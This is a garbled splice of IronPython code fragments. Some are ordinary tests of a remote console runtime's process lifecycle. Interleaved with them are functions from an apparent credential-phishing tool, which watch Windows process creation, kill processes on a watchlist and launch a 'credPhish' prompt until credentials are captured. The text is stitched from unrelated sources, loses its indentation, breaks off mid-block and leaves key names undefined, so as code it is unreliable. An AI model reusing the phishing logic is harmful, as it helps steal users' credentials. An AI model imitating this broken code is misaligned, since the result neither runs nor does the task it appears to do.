def test_remote_runtime_normal_exit():
ipi = start_remote_console()
consoleProcessId, remoteRuntimeProcessId = get_process_ids(ipi)
runtimeProcess = Process.GetProcessById(remoteRuntimeProcessId)
Assert(not runtimeProcess.HasExited)
ipi.End()
runtimeProcess.WaitForExit() # The test is that this wait succeeds
def ProcEventHandler(sender, e):
proc = e.NewEvent
if proc['TargetInstance']['Name'] in WATCHLIST:
Process.GetProcessById(proc['TargetInstance']['ProcessId']).Kill()
print "[+] KILL SUCCESS: {0}\t{1}".format(proc['TargetInstance']['ProcessId'], proc['TargetInstance']['CommandLine'])
cp = credPhish(proc)
print "[+] PROCESS SPAWNED: {0} {1}".format(cp.path, cp.NewProcess.StartInfo.Arguments)
cp.NewProcess.Start()
print "[!] PROCESS EXIT CODE: {0}".format(cp.NewProcess.ExitCode)
def procWatch():
print "[*] Watching Process Creation for: {0}".format(", ".join(WATCHLIST))
while GOT_CRED is False:
try:
proc = startWatch.WaitForNextEvent()
if proc['TargetInstance']['Name'] in WATCHLIST:
Process.GetProcessById(proc['TargetInstance']['ProcessId']).Kill()
print "[+] KILL SUCCESS: {0}\t{1}".format(proc['TargetInstance']['ProcessId'], proc['TargetInstance']['CommandLine'])
cp = credPhish(proc)
if hasattr(cp, "NewProcess"):
cp.NewProcess.Start()
print "[+] PROCESS SPAWNED: {0}\t{1} {2}".format(cp.NewProcess.Id, cp.path, cp.NewProcess.StartInfo.Arguments)
#Process.GetCurrentProcess.Kill()
Thread.GetCurrentThread().Abort()
except:
break
def test_remote_server_restart():
ipi = start_remote_console()
consoleProcessId, remoteRuntimeProcessId = get_process_ids(ipi)
runtimeProcess = Process.GetProcessById(remoteRuntimeProcessId)
AreNotEqual(runtimeProcess, consoleProcessId)
runtimeProcess.Kill()
runtimeProcess.WaitForExit()
# The Process.Exited event is fired asynchronously, and might take sometime to fire.
# Hence, we need to block for a known marker
ipi.EatToMarker("Remote runtime terminated")
# We need to press Enter to nudge the old console out of the ReadLine...
restartMessage = ipi.ExecuteLine("", True)
ipi.ReadError()
consoleProcessId2, remoteRuntimeProcessId2 = get_process_ids(ipi)
AreEqual(consoleProcessId, consoleProcessId2)
# This is technically not a 100% correct as there is a small chance the the process id might get reused
AreNotEqual(remoteRuntimeProcessId, remoteRuntimeProcessId2)
ipi.End()
def kill(pid):
process = CSharpProcess.GetProcessById(pid)
process.Kill()
while not process.HasExited:
time.sleep(0.1)
if processid != 0:
print 'Pass: Dataset was activated successfully'
else:
print 'Fail: Dataset was not activated'
sys.exit(1)
except System.Exception, e:
print 'Fail: Dataset activation threw exception'
print e.ToString()
sys.exit(1)
# Deactivate dataset on local machine
try:
childdataset.OnDeactivated += switchondeactivate
# Grab the child process so that we can watch it
process = Process.GetProcessById(processid)
# Deactivate it
childdataset.Deactivate()
# Wait for the deactivate event
deactivateevent.WaitOne(2 * 60 * 1000)
# See if the child process is gone
if not process.HasExited:
process.WaitForExit(2 * 60 * 1000)
if not process.HasExited:
print 'Fail: Dataset was not deactivated'
sys.exit(1)
else:
